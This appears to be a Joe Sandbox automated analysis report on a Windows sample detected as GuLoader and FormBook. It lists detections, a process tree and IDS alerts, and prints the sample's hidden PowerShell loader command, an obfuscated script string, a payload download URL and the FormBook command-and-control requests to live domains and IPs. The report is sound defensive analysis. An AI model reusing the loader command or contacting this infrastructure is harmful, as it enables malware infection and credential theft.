Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Salmebogs(1).exe

Overview

General Information

Sample name:Salmebogs(1).exe
Analysis ID:1564415
MD5:b5948d19a341bc22c750d129f41a55ae
SHA1:d21d67d41f27eca213fb81f2c5d68fdee27d815d
SHA256:0f1ec8d7d4cf99bce4bf482009f456a2e210c6d40d22802a196a2151170780ee
Tags:exeuser-lowmal3
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Salmebogs(1).exe (PID: 1016 cmdline: "C:\Users\user\Desktop\Salmebogs(1).exe" MD5: B5948D19A341BC22C750D129F41A55AE)
    • powershell.exe (PID: 5608 cmdline: powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Neuralgiform.Pre';$Unclog242=$Skopudsningernes.SubString(72152,3);.$Unclog242($Skopudsningernes) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Stemmeurnes.exe (PID: 5860 cmdline: "C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe" MD5: B5948D19A341BC22C750D129F41A55AE)
        • MLvvJtVcRex.exe (PID: 6620 cmdline: "C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • svchost.exe (PID: 6428 cmdline: "C:\Windows\SysWOW64\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • MLvvJtVcRex.exe (PID: 6404 cmdline: "C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 1096 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.4750377511.0000000003250000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3693581776.0000000022720000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000009.00000002.4750102999.0000000001380000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\svchost.exe", CommandLine: "C:\Windows\SysWOW64\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe" , ParentImage: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe, ParentProcessId: 6620, ParentProcessName: MLvvJtVcRex.exe, ProcessCommandLine: "C:\Windows\SysWOW64\svchost.exe", ProcessId: 6428, ProcessName: svchost.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Neuralgiform.Pre';$Unclog242=$Skopudsningernes.SubString(72152,3);.$Unclog242($Skopudsningernes), CommandLine: powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Neuralgiform.Pre';$Unclog242=$Skopudsningernes.SubString(72152,3);.$Unclog242($Skopudsningernes), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Salmebogs(1).exe", ParentImage: C:\Users\user\Desktop\Salmebogs(1).exe, ParentProcessId: 1016, ParentProcessName: Salmebogs(1).exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Neuralgiform.Pre';$Unclog242=$Skopudsningernes.SubString(72152,3);.$Unclog242($Skopudsningernes), ProcessId: 5608, ProcessName: powershell.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\SysWOW64\svchost.exe", CommandLine: "C:\Windows\SysWOW64\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe" , ParentImage: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe, ParentProcessId: 6620, ParentProcessName: MLvvJtVcRex.exe, ProcessCommandLine: "C:\Windows\SysWOW64\svchost.exe", ProcessId: 6428, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-28T10:06:16.974137+010028032702Potentially Bad Traffic192.168.2.649724212.162.149.6380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-28T10:06:46.269126+010028554651A Network Trojan was detected192.168.2.649725165.22.38.18580TCP
            2024-11-28T10:07:11.716882+010028554651A Network Trojan was detected192.168.2.649729154.88.22.10480TCP
            2024-11-28T10:07:26.583828+010028554651A Network Trojan was detected192.168.2.64973369.57.163.6480TCP
            2024-11-28T10:07:41.784656+010028554651A Network Trojan was detected192.168.2.649737104.21.6.1780TCP
            2024-11-28T10:07:56.785215+010028554651A Network Trojan was detected192.168.2.6497413.75.10.8080TCP
            2024-11-28T10:08:12.232707+010028554651A Network Trojan was detected192.168.2.649745103.168.172.3780TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-28T10:07:03.636386+010028554641A Network Trojan was detected192.168.2.649726154.88.22.10480TCP
            2024-11-28T10:07:06.293028+010028554641A Network Trojan was detected192.168.2.649727154.88.22.10480TCP
            2024-11-28T10:07:09.013613+010028554641A Network Trojan was detected192.168.2.649728154.88.22.10480TCP
            2024-11-28T10:07:18.631747+010028554641A Network Trojan was detected192.168.2.64973069.57.163.6480TCP
            2024-11-28T10:07:21.216527+010028554641A Network Trojan was detected192.168.2.64973169.57.163.6480TCP
            2024-11-28T10:07:23.880318+010028554641A Network Trojan was detected192.168.2.64973269.57.163.6480TCP
            2024-11-28T10:07:33.494131+010028554641A Network Trojan was detected192.168.2.649734104.21.6.1780TCP
            2024-11-28T10:07:36.272383+010028554641A Network Trojan was detected192.168.2.649735104.21.6.1780TCP
            2024-11-28T10:07:39.044925+010028554641A Network Trojan was detected192.168.2.649736104.21.6.1780TCP
            2024-11-28T10:07:48.917661+010028554641A Network Trojan was detected192.168.2.6497383.75.10.8080TCP
            2024-11-28T10:07:51.489229+010028554641A Network Trojan was detected192.168.2.6497393.75.10.8080TCP
            2024-11-28T10:07:54.136331+010028554641A Network Trojan was detected192.168.2.6497403.75.10.8080TCP
            2024-11-28T10:08:04.526932+010028554641A Network Trojan was detected192.168.2.649742103.168.172.3780TCP
            2024-11-28T10:08:06.770860+010028554641A Network Trojan was detected192.168.2.649743103.168.172.3780TCP
            2024-11-28T10:08:09.553131+010028554641A Network Trojan was detected192.168.2.649744103.168.172.3780TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeReversingLabs: Detection: 21%
            Multi AV Scanner detection for submitted file
            Source: Salmebogs(1).exeReversingLabs: Detection: 21%
            Yara detected FormBook
            Source: Yara matchFile source: 00000008.00000002.4750377511.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3693581776.0000000022720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4750102999.0000000001380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4750333765.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3694238419.0000000022D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: Salmebogs(1).exeJoe Sandbox ML: detected
            Source: Salmebogs(1).exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Salmebogs(1).exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: Semiaci.Absorbe$PotboysWsabbathaAbominarUnbraineIvr.stthVate maoG dekryu ndustrsGratinei UndervnNeelaprgaktor t Katharo(La,dsheTUltra orFe ruaraLyophilnRaspninsKaraktepEvenso.iAfstrafrV nillieSkjtelbdShulslb Tillokk' Genera ForsimpKc,clamieHallah sRecipietOscillor grinnieJa akar$TomatpuScryp ozl Nedkasakett,emvDelatine alvinisUndefaujPubianlp Openes BisageraFo raad Sni ter SmaaskoT iotunsHexateutSpea erhTapperiSMaila,lknonpurirOfficeraToxemiaaAthletilEla.ticeTuumbjeoPepoa opReserveeHjarne,lStormfauConfedeblin smelTestame fejlr dt Microc,ReincaruTerapeusPopolarsBagtjsdesailboar Tolvtav .ubobso pbygniDTrea riaOvermenlSuperbaeHypersenFinaleneBssepi.sGrvlingnRemi gtB rgentie reman aDeta.jetOverprou RisikotDrkikkeiG mbleroCycloheTCort deoCh,naner eleporpPo tordiFindelefOverdrei A dedus Weakyp,Kalkuleo idenumrOverbygt Crema,v CriticaPetu tssLitterruNo dige OrbatioCKo trolabjergnilA,drianfPromotikUdsalgsrAarvaagsWheneerLSt ngrio rerinddLokalplsLeopards C phalt.ubspac.Fetichd Interne AllophMrundioreEnnisindLan ingi O tregtNillek eF,mreap-C tacyluFibro.pdbris,remTvrs iteBerigtijKuns ans ndownlsolso.tbSclerozBBundedeeLoranstvOc,lusii Bullyb s rmforsTidsspitPrewelwx DormmiPOncominiForbehod hu tled EnclitlHomotheePoechorsUdsttelo LuvishEFreqfyrxMandssapUnd rsglo muntro MoseloiAbastartFilicalrDiatermHTrn.brnjGriz.lyeS.bdepumR ngvejm flbshue rossamvLanceri Burtyle CheweleC hanne BondmamMisplanpEfterbreForelstnco,peti$CantilaaUncrankcCubiconaSammen,tS oebruhLykketaa idtsamr Goobers KomparRUrm geraStripinm KardioaMegaloct ark,iseSalmonblInsuffitRecidivSDisc.mfiPens,onm B anch,TvillinlMicroneiUlighedsMamoncirFidolacA TalkvapLi,itoroDagsord .noglemhfunktiot Ansigth Poss saopalineFScoopinrTonnageaStriglegMaximilmKulhydreMetabionSponsora StoftrSEkstatilEnforciuFor,alisPrelatieAn,lebep navig oLej kastFigurae SystemrH samplivL nglyi.F gelejrBeboelid Te,lbraAftensmkOb.ekti,Marc raa PolitinBa knina SvovldaMa noliner dicae RedargtAudiber' Sa nci)backv,l source: powershell.exe, 00000002.00000002.3452317093.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \System.Core.pdb{ source: powershell.exe, 00000002.00000002.3455082679.00000000072BF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.3455082679.00000000072BF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Stemmeurnes.exe, 00000006.00000003.3576475859.00000000226D0000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000003.3578331629.0000000022885000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.3448936955.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Stemmeurnes.exe, Stemmeurnes.exe, 00000006.00000003.3576475859.00000000226D0000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000003.3578331629.0000000022885000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, svchost.exe
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.3448936955.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.3458185986.0000000008351000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Salmebogs(1).exeCode function: 0_2_00406370 FindFirstFileW,FindClose,0_2_00406370
            Source: C:\Users\user\Desktop\Salmebogs(1).exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\Salmebogs(1).exeCode function: 0_2_0040581E GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040581E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0076C660 FindFirstFileW,FindNextFileW,FindClose,8_2_0076C660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then xor eax, eax8_2_00759EB0

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49726 -> 154.88.22.104:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49730 -> 69.57.163.64:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49727 -> 154.88.22.104:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49725 -> 165.22.38.185:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49744 -> 103.168.172.37:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49731 -> 69.57.163.64:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49742 -> 103.168.172.37:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49733 -> 69.57.163.64:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49732 -> 69.57.163.64:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49735 -> 104.21.6.17:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49745 -> 103.168.172.37:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49737 -> 104.21.6.17:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49740 -> 3.75.10.80:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49734 -> 104.21.6.17:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49739 -> 3.75.10.80:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49741 -> 3.75.10.80:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49729 -> 154.88.22.104:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49738 -> 3.75.10.80:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49743 -> 103.168.172.37:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49728 -> 154.88.22.104:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49736 -> 104.21.6.17:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.topkapiescortg.xyz
            Source: Joe Sandbox ViewIP Address: 103.168.172.37 103.168.172.37
            Source: Joe Sandbox ViewASN Name: FORTRESSITXUS FORTRESSITXUS
            Source: Joe Sandbox ViewASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49724 -> 212.162.149.63:80
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: global trafficHTTP traffic detected: GET /kybqONxtMLpRGBHO51.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.63Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /rym4/?8jT4kL=ndVa/RILK9FLDRpgtoZJ+J8IBXYKH57ZDy7Pf7hM0FMVC1dzhL8viYhuuez44cZISqlmpTXSVNjrzOBKappePk6RQICM+G+QyTBiA70rdrzzN+VPX4YC9zgU1gXoNV1ZFV83DTE=&-pmdf=w6-PZpOHNlat HTTP/1.1Host: www.carhireheaven.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /f425/?8jT4kL=6oWh1fqdSfng0Pjmt4p2Tl7mRdUP/1qrFSh3ZEd4swSnlT4IHTKt/yR7Nn5bH6bsG60HcQ1M+zXYt/C+9G9vrVx9LvwHKTPPcluFpxFk0AZ9f6fsXKxFHhnFilmSMHOH+bDioKs=&-pmdf=w6-PZpOHNlat HTTP/1.1Host: www.dy01urj.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /ir2n/?8jT4kL=n0nw8/H3BoTEcN7zdQK4h5Pq0YxvTroU8JdHjhF/1WvMYiVgjVi7rxPCE4QNN9j365ahaJvOAjH+lnxKDIqr8fD4f6QXWf5NwsAjHJc3hwUW8hetWLjodHBwgSRg3Fz4puXvFwU=&-pmdf=w6-PZpOHNlat HTTP/1.1Host: www.openhorizons.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /vn7h/?8jT4kL=on6JE3FYRodJdM1x+4K+5pUS6O0RuQSqvYhTcMVIKJIhdKL5ISeoZA3c+V1uZgRVwgcePlNUSouM/yl9PRA+Tn5EEaKvDdwkQb22NNObOIpoGQnkHbmo3oyXaFXcK2lCv3NncTU=&-pmdf=w6-PZpOHNlat HTTP/1.1Host: www.topkapiescortg.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /lo90/?8jT4kL=gXkjcBwJoJePUPP73D1k4nKT6J/2tj39H9Xv2qxWyJxgoYDAQfNx/5lL6sEukOnTtNLESQT8ae5yfHdk/AMkgP5+8UR/3nx2NgYPLGwKf77yIeyRgEv4SQMvZxGfrREQVLHKYMQ=&-pmdf=w6-PZpOHNlat HTTP/1.1Host: www.thezensive.workAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
